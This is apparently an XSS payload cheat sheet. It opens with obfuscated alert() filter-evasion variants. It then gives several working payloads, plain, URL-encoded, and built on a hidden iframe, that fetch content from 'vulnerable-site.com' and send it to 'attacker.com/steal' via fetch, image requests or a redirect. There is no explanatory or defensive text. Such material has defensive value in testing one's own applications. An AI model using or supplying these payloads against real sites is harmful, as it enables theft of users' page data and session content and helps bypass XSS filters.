
- (function(x){this[x+`ert`](1)})`al`
- window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
- document['default'+'View'][`\u0061lert`](3)
- this.ownerDocument.defaultView['\u0061lert'](4)


https://vulnerable-site.com/page1?param1=fetch('https%3A%2F%2Fvulnerable-site.com%2Fpage2').then(response%20%3D%3E%20response.text()).then(body%20%3D%3E%20fetch('https%3A%2F%2Fattacker.com%2Fsteal%3Fdata%3D'%20%2B%20encodeURIComponent(body)));

<script>
fetch('https://vulnerable-site.com/page2')
  .then(response => response.text())
  .then(body => fetch('https://attacker.com/steal?data=' + encodeURIComponent(body)));
</script>


%3Cscript%3Evar%20iframe%20%3D%20document.createElement%28%27iframe%27%29%3Biframe.style.display%20%3D%20%27none%27%3Biframe.src%20%3D%20%27https%3A%2F%2Fvulnerable-site.com%2Fpage2%27%3Bdocument.body.appendChild%28iframe%29%3BsetTimeout%28function%28%29%20%7Btry%20%7Bvar%20bodyContent%20%3D%20iframe.contentWindow.document.body.innerHTML%3Bvar%20img%20%3D%20new%20Image%28%29%3Bimg.src%20%3D%20%27https%3A%2F%2Fattacker.com%2Fsteal%3Fdata%3D%27%20%2B%20encodeURIComponent%28bodyContent%29%3B%7Dcatch%28e%29%20%7Bconsole.log%28%27Error%20accessing%20iframe%20content%3A%20%27%2C%20e%29%3B%7D%7D%2C%203000%29%3B%3C%2Fscript%3E

fetch('https://vulnerable-site.com/page2')
  .then(response => response.text())
  .then(body => {
    document.location = 'https://attacker.com/steal?data=' + encodeURIComponent(body);
  })
  .catch(err => console.error('Error fetching page body:', err));

